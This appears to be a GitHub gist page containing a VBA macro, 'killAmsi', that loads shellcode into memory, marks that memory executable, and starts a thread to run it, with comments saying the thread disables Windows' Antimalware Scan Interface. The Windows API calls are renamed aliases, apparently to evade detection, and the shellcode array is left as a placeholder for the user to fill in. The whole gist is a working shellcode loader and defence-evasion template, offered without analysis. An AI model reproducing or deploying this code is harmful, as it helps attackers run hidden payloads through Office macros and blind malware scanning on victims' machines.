-
-
Save DanShaqFu/5736ae0530f78ed0bc8318f87682440b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub killAmsi() | |
| Dim threadID As Long | |
| Dim retVal As Long | |
| Dim oldProtectionFlags As Long | |
| Dim payload As Variant | |
| Dim myShellCode As Long | |
| Dim offset As Long | |
| Dim myByte As Long | |
| payload = Array(your shell code goes here) | |
| myShellCode = AllocStuffLocal(0, UBound(payload), &H1000, &H4) | |
| Debug.Print "got memory at: " & Hex(myShellCode) | |
| Dim bytesWritten As Long | |
| bytesWritten = 1337 | |
| Dim magicWord As Long | |
| retVal = ProtectStuffLocal(ByVal myShellCode, 10, ByVal &H40, ByVal VarPtr(oldProtectionFlags)) | |
| For offset = LBound(payload) To UBound(payload) | |
| myByte = payload(offset) | |
| retVal = ToString(ByVal VarPtr(myByte), ByVal 1, ByVal 2, ByVal myShellCode + offset, ByVal VarPtr(bytesWritten)) | |
| Next offset | |
| threadID = CreateStuffLocal(0, 0, myShellCode, &HDEADBEEF, 4, 0) | |
| Debug.Print "got thread id: " & threadID | |
| ' start measuring time | |
| Dim startTime As Single | |
| startTime = Timer() | |
| ' start our thread with our shell code | |
| ResumeStuff ByVal threadID | |
| ' wait until the thread terminates --> has killed ASMI | |
| retVal = WaitForSingleStuff(ByVal threadID, ByVal -1) | |
| Dim endTime As Single | |
| endTime = Timer() | |
| Dim runTime As Single | |
| runTime = endTime - startTime | |
| Debug.Print "runtime: " & runTime | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment